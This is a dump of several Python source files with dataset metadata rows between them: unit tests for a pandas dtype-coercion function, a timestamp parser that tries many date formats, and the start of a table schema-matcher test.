in_data = self.aware_datetimes + [None]
out_data = [d.isoformat() for d in self.aware_datetimes] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, str)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: str})
assert_frame_equal(result, out_df)
def test_coerce_from_datetime_bool_flag_to_boolean_no_na(self):
in_data = self.bool_flags
out_data = [bool(d.timestamp()) for d in self.bool_flags]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, bool)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: bool})
assert_frame_equal(result, out_df)
def test_coerce_from_datetime_bool_flag_to_boolean_with_na(self):
in_data = self.bool_flags + [None]
out_data = [bool(d.timestamp()) for d in self.bool_flags] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, bool)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: bool})
assert_frame_equal(result, out_df)
def test_coerce_from_random_datetime_to_boolean_no_na(self):
in_data = self.aware_datetimes
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {bool} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, bool)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {bool} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: bool})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_random_datetime_to_boolean_with_na(self):
in_data = self.aware_datetimes + [None]
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {bool} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, bool)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {bool} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: bool})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_datetime_between_0_and_1_to_boolean_no_na(self):
in_data = self.datetimes_between_0_and_1
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {bool} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, bool)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {bool} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: bool})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_datetime_between_0_and_1_to_boolean_with_na(self):
in_data = self.datetimes_between_0_and_1 + [None]
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {bool} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, bool)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {bool} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: bool})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_datetime_to_datetime_no_na(self):
in_data = self.aware_datetimes
out_data = in_data.copy()
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, datetime)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: datetime})
assert_frame_equal(result, out_df)
def test_coerce_from_datetime_to_datetime_with_na(self):
in_data = self.aware_datetimes + [None]
out_data = in_data.copy()
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, datetime)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: datetime})
assert_frame_equal(result, out_df)
def test_coerce_from_datetime_to_timedelta_no_na(self):
in_data = self.aware_datetimes
out_data = [timedelta(seconds=d.timestamp())
for d in self.aware_datetimes]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, timedelta)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: timedelta})
assert_frame_equal(result, out_df)
def test_coerce_from_datetime_to_timedelta_with_na(self):
in_data = self.aware_datetimes + [None]
out_data = [timedelta(seconds=d.timestamp())
for d in self.aware_datetimes] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, timedelta)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: timedelta})
assert_frame_equal(result, out_df)
def test_coerce_from_datetime_to_object_no_na(self):
in_series = pd.Series(self.aware_datetimes)
out_series = in_series.astype(np.dtype("O"))
# series
result = coerce_dtypes(in_series, object)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_series})
out_df = pd.DataFrame({self.col_name: out_series})
result = coerce_dtypes(in_df, {self.col_name: object})
assert_frame_equal(result, out_df)
def test_coerce_from_datetime_to_object_with_na(self):
in_series = pd.Series(self.aware_datetimes + [None])
out_series = in_series.astype(np.dtype("O"))
# series
result = coerce_dtypes(in_series, object)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_series})
out_df = pd.DataFrame({self.col_name: out_series})
result = coerce_dtypes(in_df, {self.col_name: object})
assert_frame_equal(result, out_df)
class CoerceTimedeltaDtypeTests(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
random.seed(12345)
size = 3
integers = [-1 * size // 2 + i + 1 for i in range(size)]
floats = [i + random.random() for i in integers]
cls.whole_timedeltas = [timedelta(seconds=i) for i in integers]
# ^ = [..., timedelta(-1), timedelta(0), timedelta(1), ...]
cls.timedeltas = [timedelta(seconds=f) for f in floats]
# ^ = [..., timedelta(-1+e), timedelta(0+e), timedelta(1+e), ...]
cls.timedeltas_between_0_and_1 = [timedelta(seconds=random.random())
for _ in range(size)]
# ^ = [timedelta(0+e), timedelta(0+e), timedelta(0+e), ...]
cls.bool_flags = [timedelta(seconds=(i + 1) % 2) for i in range(size)]
# ^ = [timedelta(1), timedelta(0), timedelta(1), timedelta(0), ...]
cls.col_name = "timedeltas"
def test_coerce_from_whole_timedelta_to_integer_no_na(self):
in_data = self.whole_timedeltas
out_data = [int(t.total_seconds()) for t in self.whole_timedeltas]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, int)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: int})
assert_frame_equal(result, out_df)
def test_coerce_from_whole_timedelta_to_integer_with_na(self):
in_data = self.whole_timedeltas + [None]
out_data = ([int(t.total_seconds()) for t in self.whole_timedeltas] +
[None])
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, int)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: int})
assert_frame_equal(result, out_df)
def test_coerce_from_random_timedelta_to_integer_no_na(self):
in_data = self.timedeltas
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {int} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, int)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {int} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: int})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_random_timedelta_to_integer_with_na(self):
in_data = self.timedeltas + [None]
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {int} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, int)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {int} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: int})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_timedelta_to_float_no_na(self):
in_data = self.timedeltas
out_data = [t.total_seconds() for t in self.timedeltas]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, float)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: float})
assert_frame_equal(result, out_df)
def test_coerce_from_timedelta_to_float_with_na(self):
in_data = self.timedeltas + [None]
out_data = [t.total_seconds() for t in self.timedeltas] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, float)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: float})
assert_frame_equal(result, out_df)
def test_coerce_from_timedelta_to_complex_no_na(self):
in_data = self.timedeltas
out_data = [complex(t.total_seconds(), 0) for t in self.timedeltas]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, complex)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: complex})
assert_frame_equal(result, out_df)
def test_coerce_from_timedelta_to_complex_with_na(self):
in_data = self.timedeltas + [None]
out_data = ([complex(t.total_seconds(), 0) for t in self.timedeltas] +
[None])
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, complex)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: complex})
assert_frame_equal(result, out_df)
def test_coerce_from_timedelta_to_string_no_na(self):
in_data = self.timedeltas
out_data = [str(pd.Timedelta(t)) for t in self.timedeltas]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, str)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: str})
assert_frame_equal(result, out_df)
def test_coerce_from_timedelta_to_string_with_na(self):
in_data = self.timedeltas + [None]
out_data = [str(pd.Timedelta(t)) for t in self.timedeltas] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, str)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: str})
assert_frame_equal(result, out_df)
def test_coerce_from_timedelta_bool_flag_to_boolean_no_na(self):
in_data = self.bool_flags
out_data = [bool(d.total_seconds()) for d in self.bool_flags]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, bool)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: bool})
assert_frame_equal(result, out_df)
def test_coerce_from_timedelta_bool_flag_to_boolean_with_na(self):
in_data = self.bool_flags + [None]
out_data = [bool(d.total_seconds()) for d in self.bool_flags] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, bool)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: bool})
assert_frame_equal(result, out_df)
def test_coerce_from_random_timedelta_to_boolean_no_na(self):
in_data = self.timedeltas
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {bool} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, bool)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {bool} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: bool})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_random_timedelta_to_boolean_with_na(self):
in_data = self.timedeltas + [None]
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {bool} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, bool)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {bool} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: bool})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_timedelta_between_0_and_1_to_boolean_no_na(self):
in_data = self.timedeltas_between_0_and_1
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {bool} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, bool)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {bool} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: bool})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_timedelta_between_0_and_1_to_boolean_with_na(self):
in_data = self.timedeltas_between_0_and_1 + [None]
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {bool} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, bool)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {bool} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: bool})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_timedelta_to_datetime_no_na(self):
in_data = self.timedeltas
out_data = [datetime.fromtimestamp(t.total_seconds(), tz=timezone.utc)
for t in self.timedeltas]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, datetime)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: datetime})
assert_frame_equal(result, out_df)
def test_coerce_from_timedelta_to_datetime_with_na(self):
in_data = self.timedeltas + [None]
out_data = [datetime.fromtimestamp(t.total_seconds(), tz=timezone.utc)
for t in self.timedeltas] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, datetime)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: datetime})
assert_frame_equal(result, out_df)
def test_coerce_from_timedelta_to_timedelta_no_na(self):
in_data = self.timedeltas
out_data = in_data.copy()
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, timedelta)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: timedelta})
assert_frame_equal(result, out_df)
def test_coerce_from_timedelta_to_timedelta_with_na(self):
in_data = self.timedeltas + [None]
out_data = in_data.copy()
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, timedelta)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: timedelta})
assert_frame_equal(result, out_df)
def test_coerce_from_timedelta_to_object_no_na(self):
in_series = pd.Series(self.timedeltas)
out_series = in_series.astype(np.dtype("O"))
# series
result = coerce_dtypes(in_series, object)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_series})
out_df = pd.DataFrame({self.col_name: out_series})
result = coerce_dtypes(in_df, {self.col_name: object})
assert_frame_equal(result, out_df)
def test_coerce_from_timedelta_to_object_with_na(self):
in_series = pd.Series(self.timedeltas + [None])
out_series = in_series.astype(np.dtype("O"))
# series
result = coerce_dtypes(in_series, object)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_series})
out_df = pd.DataFrame({self.col_name: out_series})
result = coerce_dtypes(in_df, {self.col_name: object})
assert_frame_equal(result, out_df)
class CoerceObjectDtypeTests(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
class NonCastableObject:
pass
class CastableObject:
def to_datetime(self) -> datetime:
return datetime.fromtimestamp(random.randint(0, 86400),
tz=timezone.utc)
def to_timedelta(self) -> timedelta:
return timedelta(seconds=random.randint(0, 86400))
def __int__(self) -> int:
return random.randint(0, 10)
def __float__(self) -> float:
return random.random()
def __complex__(self) -> complex:
return complex(random.random(), random.random())
def __str__(self) -> str:
return chr(random.randint(0, 26) + ord("a"))
def __bool__(self) -> bool:
return bool(random.randint(0, 1))
size = 3
cls.non_castable_objects = [NonCastableObject() for _ in range(size)]
cls.castable_objects = [CastableObject() for _ in range(size)]
cls.nones = [None for _ in range(size)]
cls.col_name = "objects"
def test_coerce_from_object_to_integer(self):
pass
# raise NotImplementedError()
def test_coerce_from_object_to_float(self):
pass
# raise NotImplementedError()
def test_coerce_from_object_to_complex(self):
pass
# raise NotImplementedError()
def test_coerce_from_object_to_string(self):
pass
# raise NotImplementedError()
def test_coerce_from_object_to_boolean(self):
pass
# raise NotImplementedError()
def test_coerce_from_object_to_datetime(self):
pass
# raise NotImplementedError()
def test_coerce_from_object_to_timedelta(self):
pass
# raise NotImplementedError()
def test_coerce_from_object_to_object(self):
pass
# raise NotImplementedError()
# def test_check_dtypes_datetime_mixed_timezones(self):
# test_df = pd.DataFrame({"timestamp": [datetime.now(timezone.utc),
# datetime.now()]})
# self.assertTrue(check_dtypes(test_df, timestamp=datetime))
# def test_coerce_dtypes_kwargless_error(self):
# atomics = [t.__name__ if isinstance(t, type) else str(t)
# for t in AVAILABLE_DTYPES]
# err_msg = (f"[datatube.stats.coerce_dtypes] `coerce_dtypes` must be "
# f"invoked with at least one keyword argument mapping a "
# f"column in `data` to an atomic data type: "
# f"{tuple(atomics)}")
# with self.assertRaises(RuntimeError) as err:
# coerce_dtypes(self.no_na)
# self.assertEqual(str(err.exception), err_msg)
# def test_coerce_dtypes_kwargs_no_na_no_errors(self):
# for col_name, expected in self.conversions.items():
# for conv in expected:
# coerce_dtypes(self.no_na, **{col_name: conv})
# def test_coerce_dtypes_kwargs_with_na_no_errors(self):
# for col_name, expected in self.conversions.items():
# for conv in expected:
# coerce_dtypes(self.with_na, **{col_name: conv})
# def test_coerce_dtypes_matches_check_dtypes(self):
# # This does not work for coercion to <class 'object'> because of the
# # automatic convert_dtypes() step of check_dtypes. These columns will
# # always be better represented by some other data type, unless it was
# # an object to begin with.
# for col_name, expected in self.conversions.items():
# for conv in expected:
# result = coerce_dtypes(self.no_na, **{col_name: conv})
# na_result = coerce_dtypes(self.with_na, **{col_name: conv})
# check_result = check_dtypes(result, **{col_name: conv})
# check_na_result = check_dtypes(na_result, **{col_name: conv})
# if conv != object:
# try:
# self.assertTrue(check_result)
# self.assertTrue(check_na_result)
# except AssertionError as exc:
# err_msg = (f"col_name: {repr(col_name)}, typespec: "
# f"{conv}, expected: {expected}")
# raise AssertionError(err_msg) from exc
# def test_coerce_dtypes_returns_copy(self):
# result = coerce_dtypes(self.with_na, a=float)
# self.assertNotEqual(list(result.dtypes), list(self.with_na.dtypes))
# def test_coerce_dtypes_datetime_preserves_timezone(self):
# raise NotImplementedError()
if __name__ == "__main__":
unittest.main()
| 40.286612
| 80
| 0.634175
| 16,410
| 121,867
| 4.388787
| 0.014381
| 0.051027
| 0.077284
| 0.064676
| 0.960941
| 0.955873
| 0.948875
| 0.943918
| 0.933435
| 0.913205
| 0
| 0.003513
| 0.259529
| 121,867
| 3,025
| 81
| 40.286612
| 0.79459
| 0.059302
| 0
| 0.817529
| 0
| 0
| 0.09488
| 0.047238
| 0
| 0
| 0
| 0
| 0.187261
| 1
| 0.090038
| false
| 0.00431
| 0.004789
| 0.003352
| 0.103448
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
afe8be14fffe4eab282e23a16681b34737931618
| 1,946
|
py
|
Python
|
lesson-12/01/timestamp.py
|
minimum-hsu/tutorial-python
|
667692e7cd13a8a4d061a4da530dc2dfe25ac1de
|
[
"MIT"
] | null | null | null |
lesson-12/01/timestamp.py
|
minimum-hsu/tutorial-python
|
667692e7cd13a8a4d061a4da530dc2dfe25ac1de
|
[
"MIT"
] | null | null | null |
lesson-12/01/timestamp.py
|
minimum-hsu/tutorial-python
|
667692e7cd13a8a4d061a4da530dc2dfe25ac1de
|
[
"MIT"
] | null | null | null |
from datetime import datetime
def parse_timestamp(t):
try:
return datetime.strptime(
t,
'%Y-%m-%dT%H:%M:%SZ'
).utctimetuple()
except:
pass
try:
return datetime.strptime(
t,
'%Y-%m-%dT%H:%M:%S.%fZ'
).utctimetuple()
except:
pass
try:
return datetime.strptime(
t,
'%Y-%m-%dT%H:%M:%S%z'
).utctimetuple()
except:
pass
try:
return datetime.strptime(
t,
'%Y-%m-%dT%H:%M:%S.%f%z'
).utctimetuple()
except:
pass
try:
return datetime.strptime(
t,
'%Y-%m-%dT%H:%M:%S'
).utctimetuple()
except:
pass
try:
return datetime.strptime(
t,
'%Y-%m-%dT%H:%M:%S.%f'
).utctimetuple()
except:
pass
try:
return datetime.strptime(
t,
'%Y-%m-%d %H:%M:%SZ'
).utctimetuple()
except:
pass
try:
return datetime.strptime(
t,
'%Y-%m-%d %H:%M:%S.%fZ'
).utctimetuple()
except:
pass
try:
return datetime.strptime(
t,
'%Y-%m-%d %H:%M:%S%z'
).utctimetuple()
except:
pass
try:
return datetime.strptime(
t,
'%Y-%m-%d %H:%M:%S.%f%z'
).utctimetuple()
except:
pass
try:
return datetime.strptime(
t,
'%Y-%m-%d %H:%M:%S'
).utctimetuple()
except:
pass
try:
return datetime.strptime(
t,
'%Y-%m-%d %H:%M:%S.%f'
).utctimetuple()
except:
pass
try:
return datetime.strptime(
t,
'%a %b %d %H:%M:%S %Z %Y'
).utctimetuple()
except:
pass
return None
| 17.531532
| 37
| 0.400308
| 204
| 1,946
| 3.813725
| 0.127451
| 0.150386
| 0.284062
| 0.417738
| 0.898458
| 0.892031
| 0.892031
| 0.892031
| 0.892031
| 0.892031
| 0
| 0
| 0.44964
| 1,946
| 110
| 38
| 17.690909
| 0.726424
| 0
| 0
| 0.829787
| 0
| 0
| 0.132134
| 0.022108
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010638
| false
| 0.138298
| 0.010638
| 0
| 0.170213
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 10
|
b328226b7a463946689852a8e54f45bd61fef3b4
| 14,450
|
py
|
Python
|
tests/test_table_aggregation/test_schema_matcher.py
|
afcarl/corvid
|
e257074edeac1e8dce4a737b60e93a9bea37b6b9
|
[
"Apache-2.0"
] | 1
|
2019-04-15T13:49:39.000Z
|
2019-04-15T13:49:39.000Z
|
tests/test_table_aggregation/test_schema_matcher.py
|
afcarl/corvid
|
e257074edeac1e8dce4a737b60e93a9bea37b6b9
|
[
"Apache-2.0"
] | null | null | null |
tests/test_table_aggregation/test_schema_matcher.py
|
afcarl/corvid
|
e257074edeac1e8dce4a737b60e93a9bea37b6b9
|
[
"Apache-2.0"
] | 1
|
2020-09-02T13:49:52.000Z
|
2020-09-02T13:49:52.000Z
|
import unittest
from corvid.types.table import Token, Cell, Table
from corvid.table_aggregation.pairwise_mapping import PairwiseMapping
from corvid.table_aggregation.schema_matcher import SchemaMatcher, \
ColNameSchemaMatcher
class SchemaMatcherTest(unittest.TestCase):
def setUp(self):
self.table_source = Table.create_from_cells([
Cell(tokens=[Token(text='subject')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header1')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header2')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='x')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='1')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='2')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='y')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='3')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='4')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='z')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='5')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='6')], rowspan=1, colspan=1)
], nrow=4, ncol=3)
def test_aggregate_tables(self):
schema_matcher = SchemaMatcher()
target_schema = Table.create_from_cells(cells=[
Cell(tokens=[Token(text='subject')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header1')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header2')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='not_copied')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='not_copied')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='not_copied')], rowspan=1, colspan=1)
], nrow=2, ncol=3)
pred_aggregate_table = schema_matcher.aggregate_tables(
pairwise_mappings=[
PairwiseMapping(self.table_source, target_schema,
score=-999, column_mappings=[(1, 2), (2, 1)])
],
target_schema=target_schema)
gold_aggregate_table = Table.create_from_cells([
Cell(tokens=[Token(text='subject')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header1')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header2')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='x')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='2')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='1')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='y')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='4')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='3')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='z')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='6')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='5')], rowspan=1, colspan=1)
], nrow=4, ncol=3)
print(pred_aggregate_table)
print(gold_aggregate_table)
